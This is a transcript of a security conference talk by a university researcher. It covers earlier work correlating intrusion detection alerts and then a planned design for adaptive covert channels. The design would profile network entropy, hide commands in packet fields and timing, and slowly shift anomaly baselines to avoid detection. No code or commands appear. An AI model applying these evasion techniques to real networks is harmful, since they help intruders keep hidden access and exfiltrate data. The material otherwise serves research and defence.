 Specifically, I work in the Information Systems Technology Program, which is a, it's a very applied approach to engineering and specifically information technology systems. We're currently at the University of Central Florida developing a undergraduate security program that I'm also, I'm the one that's mainly involved in developing that. That's actually what my second talk a little bit later is on today. This is the more, maybe more interesting, more technical one. My past research includes the correlation of distributed, distributed network sensors. If you have a, if you have a large scale network, you have intrusion detection systems, you have firewalls, you have other things that are recording information saying what's going on on the network, trying to correlate that information together to bring it all together and trying to see the big picture of what's going on rather than getting these little kind of half views of what's really occurring out on the network. And also I'm working on some projects that involve combined data sharing networks for law enforcement in the state of Florida. You know, this little blurb ad about the University of Central Florida, it's down in Orlando, Florida. It's about, we've got about 42,000 students there, about 5,500 of which are in engineering. We're located about 13 miles east of Orlando, Florida. As I said, the information system technology program, this is a, really it's an applied engineering degree. It's very hands on, very real world, very current tools, not so much the traditional theoretical approach to engineering. Heavy concentration of hands on learning in the program. A little bit about the, a little bit about the background of what led me to this current idea is there was a previous research that I worked on. I gave a couple of presentations back at DEF CON 9 and 10. And this was on using Bayesian multiple hypothesis to try and analyze reports from these distributed intrusion detection systems and other types of network sensors with the idea of trying to determine if what you were seeing were correlated events, if this was a, an initial attack and a follow up, or if the two events you were seeing in two different places might be two systems communicating who shouldn't be communicating together. And to try and use multiple sensors to distribute over large distributed networks to try and do this. The basic idea behind what I was doing with that was taking target tracking methods that came out of, actually out of radar target tracking systems, trying to track real objects in the sky with various radar systems and taking that same approach and treating our, all of our sensors that we have on our network, whether it's an IDS, a firewall, a router, even a human sat there making observations about what's going on and trying to automate the correlation of that together. And this wasn't intended to totally throw the human analyst out of the loop, but just to kind of act as a sort of a first level filtering system to throw away a lot of the not, a lot of the information that you don't need in order to come to a conclusion about what's going on. With the idea that we were going to kind of move this more towards a point of view instead of looking at this one section of the network or this one part of what was going on that's visible to this one sensor, like, you know, you've got your firewall sat at the, say you got it sat at the border of your network. It sees everything that's coming in and out of the border, but it doesn't see stuff that's entirely internal to the network. You might have an intrusion detection system sat on one segment of the network that sees what's going on there, but it doesn't see what's going on on another segment of the network. And to take all these little pictures of pieces of information and to put them together to get a more complete view of what someone was doing while they were attacking the, the network. And did this through using radar tracking algorithms, specifically Bayesian multiple hypothesis tracking and making an analogy to the world of computer security where our firewalls are ideas are humans looking at what's going on on the network. Anything that records information is a sensor. That's like a radar system. The actions that the person out there trying to break into the network are doing, that's the target and that's the trace they leave behind. We're trying to put these traces to together and we're working in a situation where we've got to do this in real time. We've got incomplete data. We've got inaccurate data potentially about what's going on, depending on how your sensors are operating. Just, just a little bit more about the system. The, the idea, how this works, this idea of this multiple hypothesis tracking is as events occur on the network, as an event is when a sensor recognizes that something's occurring. When something actually pops up on the sensor, when it gives a report, when you've got an IDS, it tells you, hey, I think I see something, when you've got a firewall that decides it's not going to allow this packet or it sees something unusual. When you've got your sysadmin on your network saying, hey, you know, something weird's going on here. As these events arrive, they're analyzed. And say, for example, we're sat there and one of our systems sees a port scan happening out there. We build a hypothesis about what we think's going on. In this case, if we've got a single scan coming in from the outside world, hey, you know, that's all the information we have. That's the only hypothesis we can come to is that that's what's going on. We're seeing a port scan right now. Really, I guess actually technically you can make two hypotheses at this point. You can say, hey, there's a port scan going on or alternatively, my IDS isn't working properly and this is a false positive. Then as other events occur, say you see a buffer overflow attack against a machine following that. Well, what could be going on now? We could make the assumption that the port scan is being followed up by a buffer overflow. Someone scanned a machine for a vulnerability. Then they attacked that particular vulnerability on it. Or potentially, these could be two unrelated events that the port scan could be part of one attack. The buffer overflow could be part of a different attack on the system. And what we were trying to do with this system was trying to automate the process of figuring these out. Now, this is a simple example. This is a pretty trivial case. I mean, in this particular case, if the port scan is a scan against, you know, I don't know, against port 80. And the buffer overflow is a buffer overflow against an IIS server. Chances are those two things are related. If they're not, if the port scan doesn't match up with what the buffer overflow was, chances are they're not related. But you can extrapolate from this idea into much more complicated systems and much more complicated series of events of trying to piece together the pieces and figure out whether or not all of these events and all of these things that we see occurring across the network are related together. Are they not related together? Are they likely to be something real? Or are they likely to be a false positive caused by a imperfect sensor, imperfect IDS or firewall or human in the loop? Actually, when I was working on this, one of the most interesting sources of data that I had to work with came from the capture of the flag games here at DEF CON. Luckily, the Shmoo group captures all of that data that goes on during the capture of the flag game, the capture of that network traffic. And that provided a great playground to work in to try and see if that information could be correlated together. And this little graph I got up here, I mean this is kind of just pulled right out of context. These are some slides I grabbed just to give a bit of background about the previous research in this. Basically, what this was showing is as you let the number of hypotheses that you consider increase. In that previous example, I said that we had the two hypotheses. Either these two events are unrelated or these two events are part of a chain of a single attack. Well, we let those, we say these are our two hypotheses. And then we look at the evidence that's going on and we evaluate them. And we find out which hypotheses we think is currently the best one we have available. And then we wait for more information to come in. We'll have a certain confidence level and how confident do we believe in this hypothesis. As more information comes in, we'll build more hypotheses and we re-evaluate the likelihood of our existing hypotheses. Eventually, at least in theory, this will eventually converge to a point where one hypothesis is clearly the winning hypothesis. Now, the problem with, I said that's in theory, the problem with that is you have to consider every possible hypothesis in order to do that. And the number of hypotheses grows at a super exponential rate. So it's practically impossible to do that. There's a lot of work on the pruning of them deciding which ones you want to keep, which ones you want to throw away. And what this graph was just showing here was along the bottom is a number of hypotheses that were allowed to remain in the system going from, well, at the bottom one all the way up to 1,000. And the accuracy of how well it correlated the different attacks together. And it never quite got up to 100%, but it got up into about 93%, 94% accuracy on the capture of the flag data, being able to piece together what were related attacks. And now, of course, this was actually correlated against the baseline was done by hand. I and a few others that helped me took the data over the capture of the flag game over about a, I think it was about an eight hour period, and by hand figured out what was related information, what were related attacks, and then built a system that could do to automate that process. So this thing, it worked. This is a, it was a pretty decent idea. It worked. It didn't necessarily work as well as we had hoped initially. If you've got everything on a same network or related network where you're likely to see lots of related events, it works well. If you've got this distributed over large networks where you're likely to see many more unrelated events than related events, it goes, the accuracy goes down a bit, or at least the amount of work you have to do to get good accuracy goes way up. It's more accurate to say. So that's what had done in the past. And this got me thinking about, so this was a system that had developed to try and detect related information on a network. And then of course, you know, once you can do that, you always think about the next step. And once the next step, once you can detect something, you figure out how to hide it even better, right? You know, it's always kind of that one upmanship game that we're playing. So it got me thinking, how do we defeat a system that works like that? How could you avoid detection on a network that was well observed, well monitored, and where the information was well correlated, where you couldn't rely on the guy sat over on this part of the network, not knowing what the guy sat over on this other part of the network was doing or seeing or knew about what was going on? If you assumed that there was complete coverage of the network, how could you hide what was going on there? And I'm not talking about so much the detection of a specific attack. Like someone does a buffer overflow against a web server. They do whatever other type of initial attack to gain access to the system. But assuming they're already on there, they've got onto the system and they want to keep communicating back and forth. They've got their remote machine they're sat at. They've got access to a machine on the network. They want to communicate back and forth, but they don't want to be detected while doing it. How could you go about that and avoid detection on a well-monitored network? So, you have to look at this from the point of view of where do we have the choices about what we do? When you're talking about the initial attack, you don't have a whole lot of choices. If you've got a, I guess unless you get lucky and you see a system out there that's got a ton of vulnerabilities on it, then you've got some choices about what to do. But assume that you have limited choices of how a system is broken into. There's limited ways into the system to begin with. You don't have many choices there. So, any tool that's ridden to initially gain access to a system usually has a fairly limited lifespan. At least it's limited lifespan in the realm of people who actually care about security. You always find some bozo out there who never updates anything, never puts any security on their system. You can always get into them. But talking about the people who are serious about it, you have a limited lifespan with any sort of tool for initially getting in there. However, once you have access to a machine and all you're worried about doing is communicating with that machine, you've got a lot of choices. You know, we're not stuck with one type of communication protocol. We're not stuck with any traditional communication protocol that's out there whatsoever. The trick to this is figuring out which ones work and which ones won't be seen. So, here's the question. How do you communicate on a network without letting anyone know you're doing it? First things first, how do they detect what's going on? How does someone see what you're doing on a network? You've got IDS, you've got firewalls, you've got observers. All of these things are sat there looking at what's going on on the network. In general, I pick the IDS and I say software or human because whatever's looking at your network, whether it's automated or whether it's a person, they're trying to determine if someone's intruding on your network. You get two basic forms of this. And this applies, I think the IDS system in at least one sense is the most general case and you can kind of find derivative cases that cover the same concept for firewalls and routers and everything else out there. There's basically two forms of detection out there. Anomaly and signature detection. Signature detection works on known attacks, known events. You know, if you know exactly what you're looking for, you know when you see this packet go by, it's something bad, you wanna throw up an alert about it. Hey, that's great, you can catch it every time, it'll never get by, you know, you've got that one nailed. The only way to avoid that type of detection is to use either an unknown method or something perhaps that changes constantly, never use the same method twice. The anomaly detection, it doesn't detect misuse of the system, it doesn't detect something malicious, it just detects something unusual. So, it's not necessarily really great at trying to pick up something bad happening on your network, but it'll pick up something unusual. And it's really, if the signature detection doesn't work, that's the only chance you have left, it's looking for something unusual. If you don't know what to look for, you gotta look for things that stand out. So, we can't really avoid the signature detection. If you've got a way of communicating or a way of doing anything on the network and someone can write a signature to detect that, that's it, you can't do anything with it. It's got a limited lifespan, eventually it's going to be seen. So, the only alternative is to use something that you can't write a signature for, something that changes constantly, something that is quote unquote random, or at least appears random to anything that's observing the network. And we have to be able to do this without looking unusual. And that's the key. Not only do we have to do something, it's kind of a catch 22 in a way, because we gotta do something that's very unusual, this kind of random changing communication protocol, but we gotta do it without looking unusual. You can't stand out on there. So, the first stage of this is to detect the baseline of the network. What does the traffic on the network look like to begin with? What is occurring on the network? What happens out there all the time? And this can be done passively. You can sit back and discover what type of traffic is allowed on the network, what does normal traffic look like, and kind of build yourself a map of both what is going on on the network, what the structure of the network is, and what's allowed in and out of this network. This is not a new concept. This general idea of doing this, this is done all the time. This is how many tools and other fun little things are written and developed. But the key thing is, is that this is what, generally, this is what people do this process. Someone looks at a network, or you think about what's going on on the network. You know, a good example of this is a verse WWW shell. That's an old tool. The idea of this was that you've got a computer inside the network. It's, you're not allowed to make connections from the outside to it. You know, the firewall's gonna drop any connection, inbound connections to it. So you put a piece of software on that computer inside the network that at certain intervals, perhaps at random intervals, it looks like it's going out to a web browser. It goes, makes a web request. Except that, what that web request is doing is coming to your computer on the outside, getting the next command that you've told it to do. It carries it back as the HTTP response to the target computer, to the one that you got access to, and then it carries out that particular command. It's masqueraded looking like the computer on the inside is just surfing the web. That's a great way of hiding it, unless someone knows to look for it. Once someone knows to look for it, if you stick with it too long, they're gonna look for it, they're gonna see it, it's gonna stand out. Similarly, carrying data commands and ICMP echo, echo response packets, same sort of idea. What I'm trying to do with this project is to automate this process and make it run on the fly and have it adapt itself to whatever network it's currently working on. Look at what's going on on the network, decide what to do on the network, decide what will work there, and then carry it out. So, some aspects of network traffic are gonna have a low entropy, meaning a very low randomness. They're gonna be very kind of, the same thing's always gonna happen. Certain communication protocols are only gonna go to certain computers. DNS requests are only gonna go to your DNS servers. They're not gonna be jumping around to every computer on your network. Incoming web requests are probably only gonna come to your web server. They're not gonna come to every computer on your network. Other things are gonna look much more random, maybe outgoing web requests. People, different people, circling the web, outgoing FTP, all sorts of things. Other things are gonna be very random. There's gonna be a lot more entropy in that. And entropy is the key to hiding information. The more entropy you have on the system, the more information you can hide in that. This is like if you look at, if you look at Stegonography, for example, you're trying to hide information in something else. If you've got a bitmap, a bitmap has lots and lots of redundant information in it, versus a JPEG image. JPEG has taken a lot of that redundant information out. That's why a JPEG's smaller than a bitmap. You can hide a lot more information in a bitmap than you can in a JPEG. Higher entropy, you can hide more information inside it. So if we find what has the highest entropy on that network, what communication channels have the highest degree of randomness, we can then pick what we want to work in. And we've got all sorts of things that we can work with here. We can work with the timing of the packets. We can work with packets, sending out packets that have bad checksums, malformed checksums, all sorts of different things that we can play with. We don't have to use a SSH or Telnet or some other standard type of communication format. We can send crafted packets where the information is carried in all sorts of the different little pieces of information inside that packet. The key is we just have to make sure it doesn't look unusual when that packet goes out. So the overall concept here is we detect what the network baseline condition is. On the specific network that we're looking at, what does normal look like? What doesn't look unusual? And then select from that the potential communication channels. Determine which ones have highly random information on the network. Put it down, initially we can select from anything. We can craft a packet that does anything we want. We're gonna look at what happens on the network, figure out what's allowed, limit it to that, and then limit it to what has a lot of entropy within that. And then we have to somehow communicate this method to the receiver on the outside. We have to get the information of how we're going to use, we have to get that to the receiver outside. And then maintain a, you know, I put almost undetectable presence on the network. You never should think you're undetectable. You should never think anything's absolute because it never is. That's how you always get yourself into trouble. But we can monitor and update the network conditions to stay hidden. If the network conditions change, we can change the scheme we're using to communicate. On the network, if we just sit there and listen, what can we learn by listening on the network? There's all sorts of things that we can find out by just sitting there and listening, not doing anything active, not doing anything to be discovered. You can figure out what types of packets are allowed inside the network, what types of packets are allowed outside the network. We can figure out the architecture of the network, where are the switches, where are the routers, where are other machines on this network? And then look at what types of packets are flying around. What types of packets does the machine that I'm on send and receive? What types of packets do other machines out there send and receive? And from this, get an idea of what is allowed to move around this network, what is moving around this network, and what we can inject into the data flowing around without being, without sticking out like a sore thumb and being immediately identified. So, if we narrow down these choices, we start with the ability to send any type of packet, you know, send it to any port whatsoever. We start pairing it down based on what's available, figure out what has the highest entropy. Look at this, look at the type of packets based on the protocol, the ports they're using, et cetera. And look at the entropy based on how often do these packets fly? How different is the data in these packets whenever they go by? What different machines do these types of packets go to? And then pick a channel that we know we can get from point A to point B. We can get from inside the network we've got access to the machine on, out of that network over to the place where we want to get the information to, or back and forth, vice versa, either way. We can figure out what can get into one, out of one network into another, and then back the other way. Doesn't necessarily have to be a symmetric communication channel. The packets that you send out, the packets that you send going out one way don't have to look a heck of a lot like the packets coming back in the other way. As long as they're getting to the right segment on the network, as long as they're getting down to the right branch off of your switch, so that it can be picked up by a network card in promiscuous mode. As long as you can get down that far and you know what to look for, each guy on each end knows what to look for, you don't have to have it even be a symmetric communication channel between them. You can have essentially two different channels going back and forth. One of the big challenges with this system is starting the conversation. If you've got a piece of software running on the inside of this network, and it's gonna start communicating with you on the outside, and you don't know what particular communication scheme it's gonna be using, there's some difficulties in getting that first packet out of there, that first piece of information to the outside without having it be something that can easily be written as a signature. It's hard to change things or inject randomness into the first bit of communication. There's some ways that we can limit how signature vulnerable that first bit of communication is, but that's one of the points that needs, that presents some challenge and needs some work on in this. Having the communication software itself remain undetected on the remote machine, not talking about what the software is doing, but actually having the software itself avoid detection. Of course, that's another challenge, but that's a completely different story. That's whether it's something that's using a polymorphic code that changes from one installation to another or even changes itself constantly. There are ways around that, but it is another challenge in there. The third one that's actually, I think a fairly interesting one is the problem on a low entropy network. What do you do when there's not a whole lot of randomness going on on the network? If there's not a lot of randomness in the packets, how do we stay hidden in it? We have to ensure that every packet that we send out doesn't significantly affect the statistical baseline of the network so that an anomaly detection system sat on the network will not recognize this as something unusual. It will not stand out. It won't push the statistical analysis of the network beyond the limits, beyond the thresholds that we currently have, and it will avoid becoming an anomaly. This is actually the area right now that I'm concentrating on, trying to figure out the best methods for communicating and picking channels and picking well hidden channels on a low entropy network. So just as a summary in the system, what's real, what's not real? So far, the allowed protocols discovery, the network architecture discovery, the statistical profiling of the network, those are working prototypes, those modules, those parts of the system are working prototypes. Next stages that we're moving towards are the selection of the communication scheme, implementation of the communication, and the adaptation to changing network conditions. I hope that by this time next year, this will actually be a working package that I can give maybe a bit better presentation and demonstration of what it's actually doing, but this is the current idea. Anybody that has any interest in this or any ideas or feedback or wants to tell me why I'm crazy for thinking this, feel free, there's my contact information, and that's it for about a 25 minute presentation. There's one question. That is a great question. I'll take that, I'll try and answer one more real quick. He asks, is there any concept of trying to actually change the baseline of the network so that you can do something that used to look unusual, make it not look unusual anymore? That is, it's not one of the first level items on there, that's a pretty advanced way of working it, but actually changing, injecting stuff in slow enough that the system, the anomaly detection system, adapts to it and thinks that's normal, that is one of the long term ideas on there. That's a great idea to put into this. Thank you.